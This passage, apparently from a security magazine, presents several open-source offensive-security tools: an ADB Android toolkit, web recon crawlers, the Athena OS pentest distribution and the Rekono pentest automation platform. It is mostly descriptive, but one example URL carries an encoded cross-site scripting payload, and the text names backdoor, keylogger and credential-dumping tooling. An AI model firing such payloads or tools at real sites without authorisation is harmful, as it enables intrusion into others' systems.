whatever you want. Keep in mind, any wrong command and you can brick your Android system, so be
careful whatever command you are typing; never copy and paste code or commands that you don’t
trust the origin and authenticity.
40
For General Purpose Usage
Aim: Disable the bloatware of your system that you can't uninstall or remove from your Android device.
Procedure in brief: What we are going to do is to uninstall the apps that you are unable to disable and
you want to disable it.
Just connect your Android system and get the Android package name that looks like this
com.google.android.youtube
You can also get the Android package name if you’re not sure by the PlayStore link.
Prerequisite: Catch the earlier topic “Preparing Your Android Device” and set up the tool.
Step 1: Connect your Android device to the host machine and if the phone prompts some dialog for
confirmation, click yes or allow.
Step 2: Change the directory to where you have cloned the ADB-Toolkit.
Step 3: Execute the script by running the command “sudo ./ADB-Toolkit” and choose Y/N whether to
restart the ADB server or not; it is recommended to not restart the server if you are already connected
to a client and just open another instance of ADB-Toolkit.
41
Step 4: Click on option 14, which is “List All Installed Package”; this will list all the installed packages.
Select any package name that you want to uninstall, e.g., we’ll select the below package:
com.fingersoft.hillclimb
In the next step, we will input the above package name and see the result.
Step 5: Click on option 13, which is “Uninstall An Package”. After selecting that, you have to enter the
package name. In this demo, we will use this package: com.fingersoft.hillclimb, a game that is
preinstalled on my device.
For more features, and to manage your Android device apps, you can use the tool that is developed by
me, for this sole reason.
42
GitHub link:- https://github.com/ASHWIN990/app-manager
Procedure in brief: We will use ADB’s Push Pull method because it's significantly faster than the
normal method we use that's MTP.
• ADB pull took 1.32 Min to get a 2.0G file in the host machine from the Android device
• MTP tool 3.2 Min to get a 2.0G file in the host machine from the Android device
• ADB push took 1.12 Min to put a 2.0G file from host machine to Android device
• MTP tool 3.4 Min to push a 2.0G file from the host machine to Android device
43
You can use option 23, which is “Copy a Specified File Or Folder” to pull a file or use option 24, which
is “Put A File In Device”.
Interface of copying the file from Android device to host machine, just enter the file path or folder path.
The interface of copying a file or folder from the host machine to an Android device by providing the file
path.
By doing this demo, we have seen that ADB push-pull method takes less time on Android devices,
hence you can use ADB-Toolkit to push-pull your file both in
• Wired Mode
• Wireless Mode
44
Tips To Secure Your Android Device
Only you can secure your Android device by following these tips and practicing healthy smartphone
usage.
One of the simplest tips, to protect your device, can be a blessing in disguise in case a situation goes
bad. Keeping your Android phone locked is one of the first and foremost things you should implement
to keep your Android phones secure.
If you own an Android smartphone, it is vital that you download apps and games only from trusted
sources.
Disable the USB-Debugging from the Developer options. It’s very dangerous if you don’t know what it
is.
It is important to update your Android smartphone to the latest version of the OS that is available for
your device.
Many of us usually save passwords for applications that we access on a regular basis, as it makes
signing in much easier and faster.
Hello, my name is Ashwini Sahu. I'm a Computer Science graduate who completed his Bachelor's in
technology in 2022, and as of now, I’m working at a Research Facility at the Indian Institute of
Technology, Hyderabad as a Research Assistant working on 5G Security writing POCs and testing 5G
Core network function and also writing the core software. I’m a highly motivated Cybersecurity
practitioner and an Open Source Software Supporter and Open Source Advocate.
45
@edoardottt's tools
by Edoardo Ottavineli
Intro
It had always bothered me when I picked up a FOSS tool, installed it locally, configured it, and then it
didn't have the features I wanted, or it just worked in a way I didn't like. Luckily, I know how to code
and what I want. During these years, I have played with code on GitHub so much (https://github.com/
edoardottt), and I've built some tools specifically to satisfy my needs. These tools are focused on web/
network targets and designed to automate boring or time-consuming tasks. I’m going to present to you
some of the ones I use daily.
Note: I strongly believe in Open Source software and the power of community; if you think you can add
value to these repositories (in any form: typo fix, performance or security improvements, Cariddi
regexes…), just open an issue or a Pull Request. Contributions are always welcome.
Scilla
Using the time utility, I can understand how long the scan takes: 2 minutes and 40 seconds.
46
This instead is the result of doing the same, but using nmap:
It took almost four times the time needed for scilla. Don’t get me wrong, nmap is the best tool to do this
type of scan, but if you need something lighter and faster, I just love to use other tools.
As you can see from the second image, there is a downside, scilla seems to not spot filtered ports,
which means an IDS/firewall is covering the service.
47
The subdomain subcommand enumerates subdomains both using bruteforce (with a wordlist) and
downloading data from open databases: bufferOver.run, crt.sh, HackerTarget, SonarDB, ThreatCrowd,
and VirusTotal (for this one, you need to set the proper API key).
The dir command instead enumerates directories, you can use the default wordlist or you can set one
of your favorites (seclists by Daniel Miessler is one of the most complete wordlist repositories).
Cariddi
In the last year, I spent some spare time hunting for bugs on big companies and US Government
services for Bugcrowd and guess what? A lot of information disclosures and vulnerabilities were found
with the help of this little tool. In my opinion, this type of recon is underestimated: If you find an internal
IP address hidden in the source code of a webpage or a file hosted on the server, you can take note of
it, then after a while, if you find a Server Side Request Forgery vulnerability, you could use that IP to
increase the severity of the bug or leak sensitive data (bug bounty) or pivoting towards the internal
network (penetration test). If you find an email address belonging to the target company/organization,
you can use it when logging into their services, the same goes for secrets, files, etc… even possibly
some hidden URLs that could serve non-production ready functionalities.
Cariddi comes with well-tested built-in regexes, but it also supports custom regexes if you're interested
in a particular type of information. It is also possible to use a proxy, set custom headers, use a
particular User Agent, or use a random User Agent for each request. The power of Cariddi is the
48
crawling engine: colly (http://go-colly.org/), in my opinion the best scraper built for Go language; it’s
possible to set many many options (follow robots.txt, don’t visit the same page more than one time,
cache support…). You will see that Cariddi also crawls non-sensitive or just useless files for security
(e.g. CSS, images): that’s designed in this way to spot folders or paths that could contain useful
information (and later bruteforce those folders for more content).
This tool reads input from standard input, this means you have to pipe in your list of targets to instruct
Cariddi which domains/IPs to crawl. So the general usage is:
`cat targets.txt | cariddi {options}`, where {} means optional. Without options, it just
crawls URLs. It also comes with the option -h to show the help and -examples to show some examples
to get started.
• Crawl the pages hosted on that local URL (I can’t target public services just because if I find some
secrets I can’t show you the output)
• Search for general information (-info: email, IP and BTC addresses, HTML comments)
• Search for files with specific extensions (-ext n: n is an integer going from 1 (exceptional finding) to 7
(common files))
• Search for endpoints (-e: endpoints having parameters that can be attacked: SQL injections, cross-
site scripting, SSRF, LFI, and so on)
• Search for errors (-err: 7 Databases supported (MySQL, MariaDB, MSSQL, PostgreSQL, OracleDB,
IBMDB2 and SQLite), PHP and debug errors)
Cariddi will always print the crawled URLs first and then all the information found on those pages. You
can save the output in different ways: HTML, JSON, or TXT files.
Cariddi will automatically separate the findings between different files (one file for the secrets, one file
for the URLs, one file for the errors, and so on).
49
Two other useful options are: -insecure to not verify the TLS certificate of the targets and -intensive to
search also in 2nd level subdomains. Be careful with the last one, if you start crawling www.google.com
with this option you’re telling Cariddi to search in *.google.com! Each URL belonging to the organization
will be crawled and followed, this could result in billions of URLs!
lit-bb-hack-tools
https://example.com/test?
p=%3Csvg+src%3Dx+onerror%3Dalert%281%29%3E&t=%3Csvg+src%3Dx+onerror%3Dalert%2
81%29%3E
Another tool I use a lot is tahm (Test all HTTP methods): it performs HTTP requests using all the
available methods:
This can be useful to spot different behaviors when changing the HTTP method used.
It’s impossible to explain all the tools in the repository (25 at the time of writing), but if you think those
could be useful for you, just visit the link above; you will find a README in each tool folder describing
the purpose, the output, and the usage.
As I stated at the start of the article, if you have a problem with my tools or you want to suggest a new
feature, just open an issue, a Pull Request or go to edoardoottavianelli.it and contact me.
50
About the author
51
AthenaOS
by Antonio Voza
Athena OS
In the last few years, the InfoSec community has experienced an increase of new people joining the
Cyber Security field. Day by day, reading about security incident events impacting governments and
major companies, the increasing offers in the job market and the "charm" of Cyber Security, make
people curious about this wonderful field.
More and more people are joining training hacking platforms and studying for security certifications in
order to learn and evolve their own knowledge and experience, and for having an open door for a new
job experience in the InfoSec field.
For this purpose, the average user uses pentesting operating systems that implement several hacking
tools to be used for vulnerability assessment, penetration testing, ethical hacking activities or training.
Athena OS is born to offer a different experience than the most used pentesting distributions. While
these OSes rely on the direct usage of hacking tools, Athena focuses on the user learning, indeed it
connects the user, in a comfortable manner, to access training resources and security feeds.
Technically, some distros rely mainly on Debian or GitHub repositories for retrieving security tools.
These repositories don't provide access to all security tools, and they are not easy to maintain.
Furthermore, these OSes come already with a big number of tools and services of which a good
52
percentage is never used by the average user, making it a waste of space and causing performance
degradation.
Athena is designed from scratch and, during the development phase, useless modules and services
have been excluded in order to improve performance and resource consumption. Furthermore, this
design approach allowed us to review in a detailed manner each single package and component to
include inside the distribution. It led the OS to build a user-friendly environment, despite being based
on Arch Linux.
Athena comes with an environment connected to a huge amount of security resources, but they are not
installed by default on the system. Why? Because the idea of Athena is to keep the users connected to
all resources and retrieve only the tools and items they need. In this manner, the users consume their
host resources (disk space, RAM usage, CPU usage) only for those tools and services they use. Of
course, the users also have the chance to get the main tools in one step that will be discussed.
The environment is based on GNOME Wayland instead of Xorg for the following main reasons:
• Wayland is more secure, since it reduces the usage of root and isolating the input and output of every
window
In general, Wayland has drawbacks with respect to Xorg, for example, it has compatibility issues with
several elements whereas Xorg is much more stable. Currently, Athena also implements XWayland in
order to execute those applications that run only under Xorg.
Athena OS consists of several repositories for accessing security tools and learning resources in a
comfortable manner. They are core, extra, community and multilib stable Arch Linux repositories for
system and utility packages, BlackArch repository for retrieving all the security tools, Chaotic
repository for accessing to the AUR packages directly by pacman, and Athena repository, a remote
repository where new tools or packages not stored in other existing repositories can be built and
maintained.
53
The structure of this repository is shown in https://github.com/Athena-OS/athena-repository and it is
public for any contribution.
athena-repository
├── _config.yml
├── index.md
├── LICENSE
├── README.md
├── update-database.sh
└── x86_64
├── athena-repository.db.tar.gz
├── athena-repository.db.tar.gz.sig
├── athena-repository.files.tar.gz
├── athena-repository.files.tar.gz.sig
├──<package_name>.pkg.tar.zst
├──<package_name>.pkg.tar.zst.sig
├── packages
├──<package_name>
├──build.sh
├──PKGBUILD
├── update_repo.sh
The source files of each single package is inside the packages directory. Each package has a
PKGBUILD file for defining the .pkg.tar.zst package rules and build.sh is used for automating this
process by generating the new .pkg.tar.zst, signing it, moving it and its signature to x86_64 folder and
deleting all the temporary files.
54
When all packages are built, update-database.sh must be run for calling update_repo.sh script in order
to update the athena-repository.db* files with the newly built packages with .pkg.tar.zst extension stored
in the x86_64 folder.
[athena-repository]
Server = https://athena-os.github.io/$repo/$arch
This operation is managed by a Calamares installer that will initialize all the keys stored in /usr/share/
pacman/keyrings folder.
Calamares Installer is an installer customizable framework with the purpose of satisfying a wide
variety of needs and use cases. Calamares aims to be easy and usable while remaining independent of
any Linux distribution. For these reasons, it has been chosen as the installation framework in Athena.
Calamares has been configured with several modules invoked inside /etc/calamares/settings.conf at
installation time. This configuration file mainly provides the following sections:
55
• Welcome: allowing the user to set the preferred language
• GPGPU: consisting of OpenCL modules useful for improving the cracking activities
Further modules could be added in the future, according to user needs. Under the hood of these
modules, several processes are run. The main ones are:
• contextualprocess: manage the applied theme chosen by the user and set all the elements of the
environment according to the theme itself.
• shellprocess-before: initialize repository keys, enable cron and clean FISH configuration file from
system commands.
• shellprocess-final: initialize a scheduled task for clear page cache, dentries and inode in order to
increase performance, set right permissions for critical folders, check for virtual machine tools if
needed and remove the system installation files.
During the installation, the user can click on the “Toggle log” button for reading the installation logs in
real time. In case there are any issues during the installation, Calamares provides a link to termbin.com
where the logs are temporarily saved in order to be accessed by the user for troubleshooting.
56
An important element in the system is the Display Manager that manages the login phase. By
Calamares, users can set different Display Managers as they wish under the “Login Manager” pane.
Indeed, Athena currently offers two solutions: GDM and LightDM. They are customized for Athena:
GDM
LightDM
57
At first user login, Athena launches a configuration task that consists of setting all the main Athena
elements for the user environment: PenTOXIC menu, PWNage menu, Payload to Dock. It also
initializes GNOME elements for the chosen theme, retrieves Tmux plugins and configures the NIST
Feed. Mostly for these last tasks, it is important the system is connected to the Internet. This activity is
managed by the /etc/profile.d/run-once.sh script.
By clicking on the first option, the user will install the main security resources it needs for starting its
ethical hacking activity. The Red Team Machine triggers the /usr/local/bin/red-team-deployment script
that calls BlackArch repository for getting several hacking tools, and clones popular payload
repositories to the environment (i.e., PayloadsAllTheThings).
By clicking on the second option, the system will update Arch Linux, BlackArch and Chaotic mirrorlists
in order to get the fastest mirrors for the current user. Update All Mirrors calls a reflector tool for
58
retrieving the fastest mirrors for Arch Linux repository, while /usr/local/bin/mirrors, a custom
implementation of rankmirrors, for retrieving the fastest mirrors for BlackArch and Chaotic repositories.
In Athena OS, three shells are mainly used: BASH, FISH and PowerShell. For BASH and FISH, the
same prompt pattern has been used.
Athena uses mainly FISH shell instead of BASH because of some of the following characteristics:
• Extensive UI: syntax highlighting, autosuggestions, tab completion and selection lists that can be
navigated and filtered.
• Easy scripting: new functions can be added on the fly. The syntax is easy to learn and use.
Since FISH and BASH use different statements, at the beginning of the session, the user is associated
with BASH because several bash scripts must be sourced at the login (i.e., /etc/profile.d/ scripts). When
the user opens a terminal, .bashrc is sourced for setting configuration and variables, and at the end it
executes FISH.
In Athena, Kitty is the default terminal. This choice comes due to the following reasons:
Source: https://sw.kovidgoyal.net/kitty/performance/
Along with Kitty, Tmux has also been implemented as a terminal multiplexer.
Athena OS consists of several elements with the purpose of making the user comfortable. Some of
them are key features of the user environment because they are needed to reach the objective of the
project: getting the user closer to the security and hacking resources.
59
PenTOXIC Menu
The PenTOXIC Menu is for organizing in a visually appealing manner all the main security tools that
users need to start their hacking activity. It consists of two levels:
1st level containing several hacking categories, plus Firefox browser and Code OSS as editor
2nd level consisting of hacking tools deployed for each hacking category
In detail:
These tools are not installed initially to avoid using disk space for tools or services that are never used.
For users that want access to these main tools, the Red Team Machine button of the Welcome App will
deploy them.
Athena’s tool surface can be increased by extending these main tools with the ones from BlackArch
repository.
BlackArch hacking tools can be installed in several ways. Users can install a single tool, categories or
all the tools.
60
For installing a category, execute sudo pacman -S <category-name>. There are several categories
that users can install:
Category Description
blackarch-anti-forensic Countering forensic activities.
blackarch-automation Workflow automation.
blackarch-automobile Analyzing automotive applications.
blackarch-backdoor Exploiting or opening backdoors on already
vulnerable systems.
blackarch-binary Operating on binary in some form.
blackarch-bluetooth Using Bluetooth attacks.
blackarch-code-audit Auditing existing source code for vulnerability
analysis.
blackarch-cracker Cracking cryptographic functions.
blackarch-crypto Working with cryptography, with the exception
of cracking.
blackarch-database Database exploitations on any level.
blackarch-debugger Debugging resources in realtime.
blackarch-decompiler Reversing a compiled program into source
code.
blackarch-defensive Protecting resources from malware and
attacks.
blackarch-disassembler Producing assembly output rather than the raw
source code.
blackarch-dos Using DoS (Denial of Service) attacks.
blackarch-drone Managing physically engineered drones.
blackarch-exploitation Taking advantage of exploits in other programs
or services.
blackarch-fingerprint Exploiting fingerprint biometric equipment.
blackarch-firmware Exploiting vulnerabilities in firmware.
blackarch-forensic Finding information on physical disks or
embedded memory.
blackarch-fuzzer Fuzzing tools.
blackarch-hardware Exploiting or managing anything to do with
physical hardware.
blackarch-honeypot Acting as "honeypots", i.e., programs that
appear to be vulnerable services used to
attract hackers into a trap.
blackarch-ids Intrusion Detection System tools.
blackarch-keylogger Recording and retaining keystrokes on a target
system.
blackarch-malware Malicious software or malware detection.
blackarch-misc Miscellaneous tools.
blackarch-mobile Manipulating mobile platforms.
blackarch-networking Scanning selected systems for vulnerabilities
or information about the network.
blackarch-nfc NFC technology tools.
blackarch-packer Operating on or involving packers.
blackarch-proxy Acting as a proxy, i.e., redirecting traffic
through another node on the internet.
blackarch-radio Operating on radio frequency.
blackarch-recon Actively seeking vulnerable exploits in the wild.
blackarch-reversing Any decompiler, disassembler or any similar
program.
blackarch-scanner Scanning selected systems for vulnerabilities
or information about the network.
blackarch-sniffer Analyzing network traffic.
blackarch-social Social engineering attacks.
blackarch-spoof Spoofing attacker entity.
blackarch-stego Analyzing resources for hidden information.
61
It is also possible to install all hacking tools by sudo pacman -S blackarch.
PWNage Menu
PWNage Menu allows users to quickly access the main hacking platforms for learning purposes and to
join the main Discord InfoSec Communities:
• 1st shell deploys all quick links to the main hacking platforms
• 2nd shell can be accessed by the Discurity icon on top where the user can join several Discord
InfoSec servers or open Discord App
Both PenTOXIC and PWNage are based on Simon Schneegans FlyPie menu project: https://
github.com/Schneegans/Fly-Pie.
One of the most interesting features of Athena is the deep integration with the Hack The Box platform,
accessible by the PWNage menu. Athena gives the possibility to play Hack The Box machines directly
on the OS environment in a quick and comfortable manner. It offers:
It can be done by accessing the Hack The Box icon on the PWNage menu. The menu is automatically
updated by a command inside /etc/profile.d/run-once.sh in order to call Hack The Box APIs and
retrieve the last free active machines.
62
Playing with one of these machines will edit the PS1 of the shell by showing the name of the laboratory,
the target IP address, the attacker IP address, the Hack The Box username of the user and the prize
points.
The set of tools that manages the Hack The Box environment needs of the App Token of the Hack The
Box user can be retrieved on the profile settings of the Hack The Box website. Once retrieved, it can be
set by calling the htb-update command.
Users can also play retired machines if they have a Hack The Box VIP subscription by htb-play tool. It
can list all retired machines by htb-play -l command and then start the machine by specifying its name
Payload to Dock
Another important security element in Athena is Payload to Dock. It is based on Dash 2 Dock and
keeps the access to the most famous payload repositories. It allows users to get the latest version of
payloads and access their path directly by the shell. It shows:
• Auto Wordlists
• FuzzDB
• PayloadAllTheThings
• SecLists
• Security Wordlist
63
The Dock also contains links to Mimikatz and Powersploit, and allows users to run FISH and
PowerShell.
Initially, these repositories are not installed, to avoid using disk space for payload repositories that are
never used. For users that would like to get these repositories, the Red Team Machine button of the
Welcome App can be used for deploying them.
On the system, to access these resources in a quick manner, several environment variables have been
defined:
In this manner, the user can retrieve the needed payload with less effort, for example:
or
On the Firefox ESR browser, several extensions are installed by default. Worth mentioning are the well-
known FoxyProxy, already configured for Burp Suite usage, and HacKontext, an extension that allows
users to inject website information, HTTP headers and body parameters of the active browser tab on
specific InfoSec command-line tools in order to improve and speed up their correct usage. It helps
users to copy and paste headers and any parameters automatically to the tools.
64
As an example, by visiting Arch Linux forum authentication page and selecting “Copy as FFUF”, the
clipboard stores the following string:
and the user can edit this string for adding the preferred wordlist and fuzzing parameters for attacking
the target.
65
NIST Feed
NIST Feed is a special tool able to inform users about a new published or updated CVE by a popup
notification! The notification contains a description of the CVE.
The NIST Feed can be configured according to the parameters shown by nist-feed -h. Users can
decide which kind of CVE they wish to be informed about, for instance, CVEs with a high impact on
confidentiality and integrity, or CRITICAL CVEs. Some examples:
• S e t D e s k t o p N o t i fic a t i o n s f o r l a t e s t o r u p d a t e d C V E w i t h C R I T I C A L s e v e r i t y :
nist-feed -n -l -s CRITICAL
• S h o w d e t a i l s a b o u t t h e l a s t t h r e e C V E s . N o D e s k t o p N o t i fi c a t i o n s :
nist-feed -r 3
• Show details about the last twenty CVEs with PHYSICAL as attack vector and MEDIUM severity. No
D e s k t o p N o t i fi c a t i o n s :
nist-feed -V AV:P -s MEDIUM
• Set Desktop Notifications for latest or updated CVE having high Confidentiality, Integrity and
Availability impact:
nist-feed -n -l -m C:H/I:H/A:H
o r
nist-feed -n -l -c C:H -i I:H -a A:H
• Set Desktop Notifications for latest or updated CVE with HIGH attack complexity and NETWORK as
attack vector:
nist-feed -n -l -A AC:H -V AV:N
Reference: https://nvd.nist.gov
The -s argument is used for setting a scheduled popup notification on crontab according to the
specified filters.
When the popup notification is shown, users can left-click on it for access to the NIST NVD page with
all detailed information, or right-click to close it.
66
All this technical content is surrounded by several amazing themes that are synchronized with the GTK,
icons, desktop background, Tmux, mouse cursor, Kitty terminal, Visual Code Studio and PenTOXIC
menu:
This graphical environment is created in order to decrease the complexity coming from the heritage of
the Arch Linux base system.
Finally, this is not the end of Athena OS. Athena is at the beginning of its life and there are a lot of
important implementations in mind to be applied for improving the user hacking and learning
experience. Athena is created mainly for one purpose: guiding new people closer to the world of Cyber
Security and to provide instruments for learning, growing and improving their own knowledge and skills.
67
Would you like to have a look at Athena?
Be of good cheer, and let not these things distress your heart.
68
Rekono
by Pablo Santiago López
Do you ever think about the steps that you follow when you start pentesting? You probably start by
performing some OSINT tasks to gather public information about the target. Then, maybe you run hosts
discovery and ports enumeration tools. When you know what the target exposes, you can execute
more specific tools for each service, to get more information and, maybe, some vulnerabilities. And
finally, if you find the needed information, you will look for a public exploit to get you into the target
machine. I know, I know, this is a utopian scenario, and in most cases, the vulnerabilities are found due
to the pentester skills and not by scanning tools. But before using your skills, how much time do you
spend trying to get as much information as possible with hacking tools? Probably, too much.
Rekono is a distributed platform that combines other hacking tools and their results to execute
complete pentesting processes against a target in an automated way. The findings obtained during the
executions will be sent to the user via email or Telegram notifications and can also be imported in
Defect-Dojo if an advanced vulnerability management is needed. Note that, Rekono doesn’t exploit
vulnerabilities, its goal is getting as much information as possible from the target.
So, why not automate pentesting processes and focus on finding vulnerabilities using your skills and
the information that Rekono sends you?
The main Rekono feature is the execution of external hacking tools, and it can be performed in two
different ways: including them in pentesting processes or independently. Pentesting processes are
groups of different tools and configurations that will be executed together automatically. For example,
in the picture above, you can see one default process that includes all the supported tools in Rekono:
69
The pentesting processes can be created dynamically, by including only the hacking tools that the
auditor needs for his purposes. This is possible because the dependencies between the different tool
executions are established based on the inputs and the potential results for each one. For example,
given a process that includes Nmap, SSH audit, CMSeeK and Metasploit, the executions will be
launched in that order:
• Nmap: this execution will find hosts, ports and services exposed by the target.
• SSH audit: this execution will be executed on SSH services found by Nmap to identify vulnerabilities.
• CMSeek: this execution will be executed on HTTP services found by Nmap to identify CMS
technologies and vulnerabilities.
• Metasploit: this execution will process all the CVE found by SSH audit and CMSeeK to look for
known public exploits.
In this case, SSH audit and CMSeeK can be executed at the same time because there are no
dependencies between them.
Rekono uses an element called project to organize the different resources involved in the pentesting
exercises: targets, executions, findings and auditors. As the projects group all the pentesting
information, they are very useful to create specific metrics and to restrict the access to the resources. In
the next picture, you can see the details for the project Demo:
70
Within one project, it’s possible to create all the targets included in the pentesting scope. They can be
domain names, host address, network address or IP ranges:
Moreover, it’s possible to add more context information about the target, like known open ports, known
technologies or known vulnerabilities. This information may be needed to execute some tools outside
of pentesting processes. For example, Metasploit looks for known public exploits but it needs a CVE to
perform the search, if it’s executed within a pentesting process the CVEs can be obtained from the
previous executions, but if it’s executed alone, a known vulnerability is needed. In the following image
you can see an example of this information:
71
After the target definition, it’s possible to execute processes or tools against them, by the creation of
tasks following the next form:
As you can see, the task intensity can be configured. In the case of the pentesting processes, only the
tools that support an equal or lower intensity than the configured one will be executed. Moreover, the
tasks can be created with time configuration, so that they can be executed on a specific date, after a
specific time or periodically. The last one is a very interesting feature, because it allows the automatic
check of different targets, so the users will note if new vulnerabilities appear for those targets:
72
After requesting the execution, Rekono will redirect the user to the task page where it’s possible to
review the execution progress and its results. In the next picture, we can see an Nmap execution:
In the case of the process executions, it’s possible to review the pending tool executions and the
findings for each one. In the following example, there are some executions already completed and two
Dirsearch executions still running:
73
Moreover, if the auditor needs to review the original tool output, it’s possible by clicking on the Output
tab. In the next picture, the original Nmap output is shown:
At project level, it’s possible to review the execution history in the tasks page. As you can see, this
includes the target, executed tool or project, status, auditor who requests the execution and the
execution date:
Finally, the findings identified during the execution of pentesting tasks against the targets, can be
reviewed directly in the platform at project level:
74
This page displays all the findings information by target and includes multiple filtering options. At first,
this page only displays hosts and findings without relations with other findings, like OSINT data. Then,
the user can select one finding and the page will show the related findings. For example, if the user
clicks on one host, the page will show the ports exposed by this host; then, if the user selects one port,
the page will show the technologies and vulnerabilities found in that port. Moreover, when the user
clicks on one finding, the details of these findings are shown in the bottom, for example, when is the
finding detected, by what tool and other specific finding details.
Supported tools
The supported tools by Rekono can be reviewed in the Tools page, where the user can review the
configurations and intensities supported by each tool, and the details about the required input
parameters for its execution and its potential results. Moreover, as in the processes page, the user can
order tool executions from the tool page:
75
Nowadays, Rekono supports the following 17 hacking tools:
Nmap Host discovery & Port Get up hosts, open ports and details about running services
enumeration
GitLeaks & GitDumper HTTP service analysis Get code from exposed Git repositories and then find hardcoded
credentials in the source code
Log4j Scanner HTTP service analysis Check if a web service is vulnerable to Log4Shell
CMSeeK HTTP service analysis Get information about the CMS used by a web service
OWASP JoomScan HTTP service analysis Analysis of web services that use Joomla as CMS
Telegram bot
Rekono platform includes three clients: web application, command line interface (CLI) and Telegram
bot. The Rekono bot makes the pentesting process easy, making the platform available for all users
from all devices, including the operations from the target’s creation to the findings revision.
At first, the auditor can create a target using the /newtarget command:
76
Then it’s possible to request the execution of tools or processes against this target using the /tool or /
process commands as shown in the following screenshots:
As you can see, the bot asks the user for the execution details: target, tool or process depending on
the command, configuration to apply if it’s a tool execution, wordlist to apply if it’s needed by some tool
and the execution intensity. Then the bot asks the user to confirm the task execution, and finally it
creates the task.
After the executions, if the user has enabled the Telegram notifications, he will receive the findings
details directly in the Telegram chat. In the next picture, you can see the results of an Nmap execution
77
Of course, the Rekono bot is protected by authentication, based on a one-time token that should be
used to link Telegram chats with Rekono users.
User notifications
Rekono supports different notification preferences, based on the content and the platform used to
receive the notifications. At first, it’s possible to configure what execution results the user wants to
receive: all the results of his projects or only his own executions. Then, it’s possible to configure the
email notifications or Telegram notifications (already seen in the Telegram bot section). In the next
picture, you can see the configuration options:
78
In the following pictures, you can see an example of user notification via email:
Rekono supports three different user roles: administrators, auditors and readers. The user notifications
can be very useful for all of them due to different reasons:
• Administrators are often people with responsibilities in the pentesting exercises, so that they could be
interested in being up to date about the work progress.
• Auditors need user notifications to know the latest findings of their automatic analysis, so that they
can use this information during their manual testing.
• Readers are often people in charge of follow up vulnerabilities or the target system responsible, so
they should be informed about the security situation.
Defect-Dojo integration
The findings obtained after task executions are processed automatically by Rekono: CVE information is
completed using the NVD NIST API, user notifications are sent and findings are imported in Defect-Dojo
when the integration is enabled for these Rekono projects. Defect-Dojo is a vulnerability management
platform where:
• The findings can be stored to keep traceability of the security situation of the products
• Tickets in bug trackers like JIRA can be created from the findings
• The security risk related to the findings can be treated in a proper way
79
For example, in the next picture you can see the summary information for one Defect-Dojo product:
The findings can be reviewed directly in the Rekono platform, but it is an automation tool, it isn’t a
vulnerability management tool, and sometimes a more advanced vulnerability management is needed.
So, Rekono includes an integration with Defect-Dojo in an automated way at project level. Defect-Dojo
integration is highly customizable, allowing the user to decide how the findings should be imported in
the platform and creating the Defect-Dojo products and engagements when needed. In the next
picture, the Defect-Dojo integration form can be seen:
The most comfortable way of working is enabling the automatic creation of products and engagements,
to let Rekono deal with all Defect-Dojo elements. Remember that the findings only will be imported
when the synchronization is enabled at project level. Rekono always imports the original tool outputs in
Defect-Dojo when it’s supported, so the original tool tests will appear in Defect-Dojo. In the following
image are two Nmap tests imported in Defect-Dojo from Rekono integration:
80
Wordlists
As the name says, wordlists are lists of words that can be used during pentesting processes to perform
enumeration or brute force tasks. Rekono can execute tools that may need wordlists to work correctly,
for example, Dirsearch, to find exposed endpoints in web services. For that reason, Rekono also
includes wordlist management features directly in the platform, so users can create their own wordlists
and upload them to Rekono. All the pentesting resources in Rekono, including wordlists, are shared
between all users, so everyone can access the most useful wordlists. By default, Rekono supports
some Kali Linux wordlists, shown in the next picture:
Currently, Rekono is not deployed publicly. The platform is intended to be deployed internally for
specific corporate environments or for personal usage. This project can be deployed using two main
ways:
81
Docker
Rekono can be deployed using a Docker compose environment that includes all the components
needed to run the application easily in all environments. For that, the following commands should be
executed:
$ cd rekono/
$ docker-compose build
$ docker-compose up -d
The number of execution workers can be established using the following option in the up command:
By default, the user “rekono” with password “rekono” and email “[email protected]" will be created.
This configuration can be changed using the environment variables RKN_USERNAME, RKN_EMAIL
and RKN_PASSWORD. Of course, it’s advised to change the Rekono default credentials.
PIP
If you wish to deploy Rekono in a local environment for personal usage, you can do it using Python and
PIP. The goal of this installation method is using Rekono in an OS like Kali Linux or Parrot OS, where
most of the hacking tools supported by the platform are already installed in the system. To install
Rekono using this method, the following commands should be executed:
$ rekono install
82
During the install command, the rekono CLI will ask you for your initial user information. After complete
the installation process, you can handle Rekono services using these commands:
This method is very simply, but it isn’t advised for production usage because it deploys Rekono in
development mode: debug mode is enabled in the frontend, the resources are exposed directly without
Nginx, etc. Please, only use it for strict personal usage.
You can check the full Rekono configuration details in the Rekono Wiki: https://github.com/pablosnt/
rekono/wiki/5.-Configuration
References
https://github.com/pablosnt/rekono
https://github.com/pablosnt/rekono-cli
https://hakin9.org/rekono-execute-full-pentesting-processes-combining-multiple-hacking-tools-
automatically/
https://www.kitploit.com/2022/08/rekono-execute-full-pentesting.html
https://www.defectdojo.org
https://github.com/laramies/theHarvester
https://github.com/maldevel/EmailHarvester
https://github.com/Josue87/EmailFinder
https://nmap.org/
https://github.com/rbsec/sslscan
https://nabla-c0d3.github.io/sslyze/documentation/
https://github.com/jtesta/ssh-audit
https://github.com/ShawnDEvans/smbmap
https://github.com/maurosoria/dirsearch
83
https://github.com/zricethezav/gitleaks
https://github.com/internetwache/GitTools/tree/master/Dumper
https://github.com/cisagov/log4j-scanner
https://github.com/Tuhinshubhra/CMSeeK/
https://github.com/OWASP/joomscan
https://www.zaproxy.org/
https://github.com/sullo/nikto
https://www.exploit-db.com/searchsploit
https://www.metasploit.com/
84
AutoPWN Suite:
The Project for Scanning and Exploiting Systems Automatically
by Kaan Gültekin
Overview
In today’s world, hackers are looking for any opportunity to exploit a system and take advantage of it.
This is why it is so important to keep your systems protected from any vulnerabilities that could
potentially allow hackers to breach them at any point in time. In the modern cyber world, attacks are
more frequent than ever before. Criminals have become more sophisticated in their techniques and
continue to evolve their methods to stay one step ahead of cyber security professionals. Even though
every organization is facing cyber threats, not all of them are aware that they are being attacked. Many
